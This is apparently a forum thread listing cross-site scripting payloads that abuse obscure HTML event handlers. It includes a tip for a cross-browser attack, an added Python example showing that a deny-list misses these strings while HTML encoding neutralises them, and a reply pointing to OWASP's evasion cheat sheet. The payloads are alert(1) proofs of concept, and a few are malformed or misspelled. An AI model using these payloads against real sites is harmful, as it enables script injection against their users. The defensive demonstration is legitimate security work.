Forum Thread: Little Known Event Handlers for XSS

<xml onreadystatechange=alert(1)</script>
<style onreadystatechange=alert(1)</script>
<iframe onreadystatechange=alert(1)</script>
<object onerror=alert(1)>
<object type=image src=valid.gif onreadystatechange=alert(1)</object>
<isindex=image src=valid.gif onreadystatechange=alert(1)
<script onreadystatechange=alert(1)>
<bgsound onpropertychange=alert(1)>
<body onbeforeactivat=alert(1)>
<body onactive=alert(1)>
<body onfocus=alert(1)>

HTML5 presents many new vectors for event handlers:
<input autofocus onfocus=alert(1)>
<input onblur=alert(1) autofocus><input autofocus>
<input onscroll=alert(1)><br><br><br>...<br><input autofocus>
</a onmouseover=alert(1)>
<video src onerror=alert(1)>
<audio src=1 onerror=alert(1)>

*For an attack that works on all browsers, use an invalid image name with an onclick event handler "onclick="javascript:alert(1)*

Enjoy! You're welcome!
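
A defender's view of the list above, as an added example that is not part of the original post: it runs a subset of the posted strings through a filter that blocks only a few well-known handler names, then through HTML output encoding, and uses Python's `html.parser` to check what still parses as markup. The `DENYLIST` pattern and the function names are hypothetical, and the sample list is constructed from the strings in the post.

```python
import html
import re
from html.parser import HTMLParser

# Constructed sample: a subset of the strings listed in the post above,
# treated here as untrusted user input.
SAMPLES = [
    "<input autofocus onfocus=alert(1)>",
    "<input onblur=alert(1) autofocus><input autofocus>",
    "<video src onerror=alert(1)>",
    "<audio src=1 onerror=alert(1)>",
    "<bgsound onpropertychange=alert(1)>",
    "<script onreadystatechange=alert(1)>",
    "<body onfocus=alert(1)>",
]

# Hypothetical deny-list of "well known" handlers, as a naive filter might use.
DENYLIST = re.compile(r"\bon(click|load|error|mouseover)\s*=", re.I)


class HandlerAudit(HTMLParser):
    """Collects every tag and every on* attribute that parses as markup."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.tags, self.handlers = [], []

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)
        self.handlers += [name for name, _ in attrs if name.startswith("on")]


def audit(markup):
    """Return (tags, on* attribute names) found in the given string."""
    parser = HandlerAudit()
    parser.feed(markup)
    parser.close()
    return parser.tags, parser.handlers


def missed_by_denylist(samples):
    """Inputs that carry an event handler yet pass the deny-list filter."""
    return [s for s in samples if audit(s)[1] and not DENYLIST.search(s)]


def encoded_is_inert(samples):
    """True if no tag or handler survives HTML output encoding."""
    return all(audit(html.escape(s, quote=True)) == ([], []) for s in samples)
```

Matching on handler names fails as soon as a name is missing from the list; encoding the value for the HTML context leaves no tag or attribute for any handler to attach to.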

1 Response

Just to add to this, if anyone is interested, OWASP has a very large cheat sheet: XSS Filter Evasion
